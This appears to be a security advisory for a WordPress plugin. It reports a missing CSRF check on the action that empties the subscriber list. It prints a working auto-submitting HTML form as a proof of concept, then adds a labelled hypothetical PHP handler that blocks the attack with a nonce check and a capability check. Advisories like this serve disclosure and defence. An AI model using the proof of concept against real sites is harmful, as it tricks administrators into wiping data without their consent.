The plugin does not have a CSRF check when emptying the subscribed users list, which could allow attackers to make a logged-in admin perform that action via a CSRF attack.
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="action" value="wpmm_subscribers_empty_list">
</form>
<script>
document.getElementById("test").submit();
</script>
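
The form above succeeds because the request carries only the admin's cookies and nothing tied to a page the admin actually opened. The following is an added example of a hardened AJAX handler, not the plugin's own code: only the `wpmm_subscribers_empty_list` action name comes from the page, while the function names, nonce action, field name and table name are hypothetical placeholders.

```php
<?php
// Added example. Every "example_" name and the table name are hypothetical
// placeholders, not identifiers from the plugin.

// WordPress dispatches POST action=wpmm_subscribers_empty_list from a
// logged-in user to this hook.
add_action( 'wp_ajax_wpmm_subscribers_empty_list', 'example_empty_subscribers' );

function example_empty_subscribers() {
    // 1. CSRF check: the nonce must match one issued to this user for this
    //    action. A cross-site form cannot read it, so it cannot supply it.
    //    Passing false as the third argument lets us send our own 403.
    if ( ! check_ajax_referer( 'example_empty_subscribers', 'example_nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid or missing nonce.' ), 403 );
    }

    // 2. Authorization: a valid nonce proves intent, not privilege.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Only now perform the destructive action.
    example_delete_all_subscribers();
    wp_send_json_success( array( 'message' => 'Subscriber list emptied.' ) );
}

function example_delete_all_subscribers() {
    global $wpdb;
    // Placeholder table name; the real plugin's storage is not shown on the page.
    $table = $wpdb->prefix . 'example_subscribers';
    $wpdb->query( "TRUNCATE TABLE {$table}" );
}

// Admin-side form that issues the nonce the handler expects.
function example_render_empty_list_form() {
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>" method="POST">
        <input type="hidden" name="action" value="wpmm_subscribers_empty_list">
        <?php wp_nonce_field( 'example_empty_subscribers', 'example_nonce' ); ?>
        <button type="submit">Empty subscribers list</button>
    </form>
    <?php
}
```

With this handler in place, the auto-submitting form shown earlier receives a 403 response because it cannot include a valid `example_nonce` value.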